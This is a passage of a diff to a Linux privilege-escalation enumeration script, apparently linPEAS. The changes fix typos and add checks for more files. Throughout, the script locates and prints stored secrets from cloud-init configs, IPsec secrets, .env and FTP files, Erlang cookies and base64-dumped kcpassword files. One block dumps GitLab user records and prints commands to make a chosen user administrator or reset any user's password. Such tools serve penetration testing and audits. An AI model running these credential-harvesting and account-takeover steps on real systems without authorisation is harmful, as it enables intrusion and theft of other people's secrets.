cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analizing Cloud-Init Files (limit 70)" + print_2title "Analyzing Cloud Init Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; - print_2title "Analizing CloudFlare Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; done; echo ""; + print_2title "Analyzing CloudFlare Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; - print_2title "Analizing Erlang Files (limit 70)" + print_2title "Analyzing Erlang Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing GMV Auth Files (limit 70)" + print_2title "Analyzing GMV Auth Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing IPSec Files (limit 70)" + print_2title "Analyzing IPSec Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing IRSSI Files (limit 70)" + print_2title "Analyzing IRSSI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analizing Keyring Files (limit 70)" + print_2title "Analyzing Keyring Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; - print_2title "Analizing Filezilla Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filelliza$\"`" ]; then echo_not_found "filelliza"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filelliza$" | while read f; do ls -ld "$f" | sed -${E} "s,filelliza$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; + print_2title "Analyzing Filezilla Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then echo_not_found "filezilla"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; - print_2title "Analizing Backup Manager Files (limit 70)" + print_2title "Analyzing Backup Manager Files (limit 70)" if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; ##-- SI) passwd files (splunk) print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="`command -v splunk 2>/dev/null`" + SPLUNK_BIN="$(command -v splunk 2>/dev/null)" if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then @@ -2452,30 +2791,38 @@ if [ "`echo $CHECKS | grep SofI`" ]; then done echo "" + print_2title "Analyzing kcpassword files" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" + printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + done + echo "" + ##-- SI) Gitlab print_2title "Searching GitLab related files" #Check gitlab-rails - if [ "`command -v gitlab-rails`" ]; then + if [ "$(command -v gitlab-rails)" ]; then echo "gitlab-rails was found. Trying to dump users..." gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" echo "" fi - if [ "`command -v gitlab-backup`" ]; then + if [ "$(command -v gitlab-backup)" ]; then echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" echo "" fi #Check gitlab files printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do - if [ "`echo $f | grep secrets.yml`" ]; then + if echo $f | grep -q secrets.yml; then echo "Found $f" | sed "s,$f,${SED_RED}," cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" - elif [ "`echo $f | grep gitlab.yml`" ]; then + elif echo $f | grep -q gitlab.yml; then echo "Found $f" | sed "s,$f,${SED_RED}," cat "$f" | grep -A 4 "repositories:" - elif [ "`echo $f | grep gitlab.rb`" ]; then + elif echo $f | grep -q gitlab.rb; then echo "Found $f" | sed "s,$f,${SED_RED}," cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," fi @@ -2483,35 +2830,39 @@ if [ "`echo $CHECKS | grep SofI`" ]; then done echo "" - print_2title "Analizing Github Files (limit 70)" + print_2title "Analyzing Github Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; - print_2title "Analizing Svn Files (limit 70)" + print_2title "Analyzing Svn Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; - print_2title "Analizing PGP-GPG Files (limit 70)" - ((command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null - ((command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null + print_2title "Analyzing PGP-GPG Files (limit 70)" + ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null + ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v netpgp || echo_not_found "netpgp") 2>/dev/null if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then echo_not_found "*.pgp"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then echo_not_found "*.gpg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analizing Cache Vi Files (limit 70)" + print_2title "Analyzing Cache Vi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; + print_2title "Analyzing Wget Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then echo_not_found ".wgetrc"; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + + ##-- SI) containerd installed print_2title "Checking if containerd(ctr) is available" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=`command -v ctr` + containerd=$(command -v ctr) if [ "$containerd" ]; then echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," ctr image list @@ -2521,7 +2872,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ##-- SI) runc installed print_2title "Checking if runc is available" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=`command -v runc` + runc=$(command -v runc) if [ "$runc" ]; then echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," fi @@ -2538,22 +2889,24 @@ if [ "`echo $CHECKS | grep SofI`" ]; then done echo "" - print_2title "Analizing Firefox Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; for ff in $(find "$f" -name "places.sqlite"); do ls -ld "$ff" | sed -${E} "s,places.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "bookmarkbackups"); do ls -ld "$ff" | sed -${E} "s,bookmarkbackups,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "formhistory.sqlite"); do ls -ld "$ff" | sed -${E} "s,formhistory.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "handlers.json"); do ls -ld "$ff" | sed -${E} "s,handlers.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "persdict.dat"); do ls -ld "$ff" | sed -${E} "s,persdict.dat,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "addons.json"); do ls -ld "$ff" | sed -${E} "s,addons.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "cookies.sqlite"); do ls -ld "$ff" | sed -${E} "s,cookies.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "cache2"); do ls -ld "$ff" | sed -${E} "s,cache2,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "startupCache"); do ls -ld "$ff" | sed -${E} "s,startupCache,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "favicons.sqlite"); do ls -ld "$ff" | sed -${E} "s,favicons.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "prefs.js"); do ls -ld "$ff" | sed -${E} "s,prefs.js,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "downloads.sqlite"); do ls -ld "$ff" | sed -${E} "s,downloads.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "thumbnails"); do ls -ld "$ff" | sed -${E} "s,thumbnails,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "logins.json"); do ls -ld "$ff" | sed -${E} "s,logins.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "key4.db"); do ls -ld "$ff" | sed -${E} "s,key4.db,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "key3.db"); do ls -ld "$ff" | sed -${E} "s,key3.db,${SED_RED},"; done; echo "";done; echo ""; + print_2title "Analyzing Firefox Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then echo_not_found "Firefox"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analizing Chrome Files (limit 70)" + print_2title "Analyzing Chrome Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then echo_not_found "Chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analizing Autologin Files (limit 70)" + print_2title "Analyzing Autologin Files (limit 70)" if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; #-- SI) S/Key athentication print_2title "S/Key authentication" - if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep skey`" ]; then + if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then printf "System supports$RED S/Key$NC authentication\n" if ! [ -d /etc/skey/ ]; then echo "${GREEN}S/Key authentication enabled, but has not been initialized" @@ -2568,7 +2921,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) YubiKey athentication print_2title "YubiKey authentication" - if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep yubikey`" ]; then + if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then printf "System supports$RED YubiKey$NC authentication\n" if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then echo "${RED}/var/db/yubikey/ is writable by you" @@ -2584,61 +2937,104 @@ if [ "`echo $CHECKS | grep SofI`" ]; then grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," echo "" - print_2title "Analizing SNMP Files (limit 70)" + + + print_2title "Analyzing SNMP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Pypirc Files (limit 70)" + print_2title "Analyzing Pypirc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; - print_2title "Analizing Ldaprc Files (limit 70)" + print_2title "Analyzing Postfix Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then echo_not_found "postfix"; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; for ff in $(find "$f" -name "master.cf"); do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Ldaprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Env Files (limit 70)" + print_2title "Analyzing Env Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Msmtprc Files (limit 70)" + print_2title "Analyzing Msmtprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Keepass Files (limit 70)" + print_2title "Analyzing Keepass Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; - print_2title "Analizing FTP Files (limit 70)" + print_2title "Analyzing FTP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then echo_not_found "ftp.config"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - print_2title "Analizing Bind Files (limit 70)" - if ! [ "`echo 